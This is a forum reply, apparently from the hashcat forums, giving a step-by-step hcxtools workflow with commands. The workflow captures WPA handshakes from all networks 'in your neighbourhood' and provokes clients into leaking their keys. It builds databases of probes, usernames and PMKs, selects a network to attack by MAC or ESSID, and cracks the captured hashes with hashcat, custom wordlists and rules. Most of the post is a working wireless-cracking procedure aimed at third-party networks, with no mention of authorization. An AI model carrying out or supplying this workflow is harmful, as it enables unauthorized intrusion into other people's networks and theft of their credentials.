hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
Hi taxil.
Neither method1 nor method 2 nor method 3.
First some words about the basic rationale behind hcxtools:
-hcxtools are analysis tools
-what we did not record is gone forever

1) get all handshakes from established connections in your neigbourhood
hcxdumptool -i interface -o record.pcap -t 5 -b blacklisthome

2) if you got all, focus on (new) clients (longterm - weeks!)
hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome

3) do the conversation
hcxpcaptool -o new.hccapx -E probelist -I identitylist -U usernamelist -P pmklist *.pcap
(if a wpa encrypted hotspot is in range, additionally use -O newall.hccapx to retrieve also connect attemps)

4) add all this raw data to your databases
cat new.hccapx >> database_best.hccapx
cat new.hccapx newall.hccapx >> database_all.hccapx
cat probelist >> databaseprobelist
cat identitylist >> databaseidentitylist
cat usernamelist >> databaseusernamelist
cat pmklist >> databasepmklist
cat database*list > workinglist (and sort this list uniq)
run workinglist against your database_best and use --potfile option of hashcat
create pmklist from hashcat.2500 potfile
cat pmklist >> databasepmklist
from now on, you can run pmklist in combination with --remove against your database and(or incomming to remove allready cracked ones in a very fast way.

Now put your focus on common ESSIDs and get them:
wlanhcx2ssid -i database_xxx.hccapx -X default (you can do this on best and/or raw)
In this case you get full advantage of reuse PBKDF2 on default.hccapx for common ESSIDs

If you need a single ESSID:
wlanhcx2ssid -i database_best.hccapx -w forced.hccapx

Retrieve info about converted networks:
wlanhcxinfo -i forced.hccapx -a -s -e | sort | uniq

and get exact the network you like to attack by mac or ESSID or whatever you like:
wlanhcx2ssid -i forced.hccapx -A mac_ap

Do not try to run useless wordlists found in www (and most of them are useless for your purpose)
Analyze your potfile to get informations about the keyspace of similar networks (same VENDOR and/or ISP)
Use -O option of hcxpcaptool (maybe a clients made a typo - half PSK, you are able to crack)
Analyze probelist (myabe PSK or simlilar PSK is inside)
Build your own wordlist based on your database lists and run rules on them
cat database lists and cracked to one list and run princeattack
Annoy the client to retrieve his NVRAM and or PSK - longterm: hcxdumptool -i interface -o record.pcap -t 60 -D -b blacklisthome
(that is not the same like a "normal" rogue AP or an evil twin - we are on protocol level)

This procedure will work:
for example https://wpa-sec.stanev.org/?stats
Last 24h processed handshakes: 15760
Last 24h performance: 176.23K/s
Last 24h submissions: 288
Last 24h founds: 231
Reply


Messages In This Thread
wlandump-ng vs hcxdumptool - by hulley - 02-10-2018, 10:26 PM
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - by ZerBea - 05-17-2018, 09:29 AM